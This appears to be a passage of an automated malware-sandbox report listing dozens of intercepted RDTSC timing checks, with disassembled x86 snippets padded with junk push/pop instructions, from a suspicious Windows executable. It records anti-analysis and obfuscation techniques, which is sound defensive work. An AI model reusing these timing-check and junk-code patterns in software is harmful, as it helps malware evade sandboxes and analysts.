Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8B3D9 second address: C8B3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E84h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8E5C0 second address: C8E5CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8D6C6 second address: C8D6D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8E5CA second address: C8E5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8E7EE second address: C8E7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8E7F4 second address: C8E802 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8E802 second address: C8E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C917D5 second address: C917D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C917D9 second address: C917E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C917E3 second address: C917E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C8F89A second address: C8F8B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F804CF71E76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C928C1 second address: C928CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C93828 second address: C93832 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C92AD5 second address: C92ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C92ADA second address: C92AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C92AE7 second address: C92AF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C92AF0 second address: C92AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9395F second address: C93975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F804C8F2DA4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F804C8F2D96h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C95809 second address: C95869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F804CF71E81h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F804CF71E78h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007F804CF71E84h 0x00000036 push 00000000h 0x00000038 mov bx, dx 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C949CE second address: C949D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C95869 second address: C95876 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9A0A0 second address: C9A0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9A0A4 second address: C9A0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F804CF71E86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9DB45 second address: C9DB69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F804C8F2D96h 0x0000000b jmp 00007F804C8F2DA2h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9DDA8 second address: C9DDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007F804CF71E76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9DEE3 second address: C9DEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C9DEE9 second address: C9DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007F804CF71E78h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA7A98 second address: CA7A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA8079 second address: CA8087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F804CF71E76h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA8087 second address: CA808E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA808E second address: CA8093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA8505 second address: CA8515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jne 00007F804C8F2D96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA8515 second address: CA8519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA891D second address: CA8922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CA8922 second address: CA8928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CAD20D second address: CAD211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CAD211 second address: CAD21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C396AF second address: C396B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C396B5 second address: C396D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E81h 0x00000009 jg 00007F804CF71E76h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C396D1 second address: C396E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C82B2F second address: C82B39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C82C19 second address: C82C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C82C1F second address: C82C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C82C29 second address: C82C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F804C8F2DA9h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83201 second address: C83205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83423 second address: C8342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C836B2 second address: C836B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83A78 second address: C83A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83A89 second address: C83A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CAC46F second address: CAC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2DA1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CAC91B second address: CAC934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F804CF71E7Ch 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CACA8C second address: CACABB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F804C8F2DB6h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CACDA0 second address: CACDB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 je 00007F804CF71E76h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CACDB0 second address: CACDE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA4h 0x00000007 jg 00007F804C8F2D9Eh 0x0000000d ja 00007F804C8F2D96h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F804C8F2DA2h 0x0000001f jne 00007F804C8F2D96h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CACDE6 second address: CACDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CAFD9D second address: CAFDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C361A8 second address: C361D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F804CF71E7Eh 0x0000000c popad 0x0000000d pushad 0x0000000e js 00007F804CF71E78h 0x00000014 pushad 0x00000015 popad 0x00000016 jne 00007F804CF71E78h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C361D3 second address: C361D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C46F67 second address: C46F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C43A88 second address: C43A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C43A8C second address: C43A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C43A92 second address: C43AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F804C8F2D9Ah 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB8AEF second address: CB8AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB908B second address: CB908F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB908F second address: CB90CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F804CF71E89h 0x0000000e pop edx 0x0000000f jl 00007F804CF71E9Fh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB93E5 second address: CB93ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB93ED second address: CB93F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB93F6 second address: CB93FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB96EC second address: CB9700 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F804CF71E7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB9700 second address: CB970E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 js 00007F804C8F2D96h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB970E second address: CB971A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB971A second address: CB9724 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F804C8F2D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB9991 second address: CB9995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CB9995 second address: CB99A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F804C8F2D98h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC0C14 second address: CC0C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F804CF71E8Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFCA7 second address: CBFCD7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804C8F2D9Ah 0x00000008 jmp 00007F804C8F2DA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F804C8F2DA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFCD7 second address: CBFCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFCDD second address: CBFCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F804C8F2DA4h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFCFD second address: CBFD01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFF57 second address: CBFF63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFF63 second address: CBFF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFF69 second address: CBFF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CBFF6D second address: CBFF92 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804CF71E76h 0x00000008 jmp 00007F804CF71E83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F804CF71E7Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC0207 second address: CC0215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC0215 second address: CC022B instructions: 0x00000000 rdtsc 0x00000002 js 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F804CF71E7Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC022B second address: CC0233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC0233 second address: CC0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC0522 second address: CC053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC053F second address: CC0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CC3064 second address: CC306F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C31137 second address: C31151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C31151 second address: C31156 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C31156 second address: C31160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83908 second address: C83932 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F804C8F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F804C8F2DA9h 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
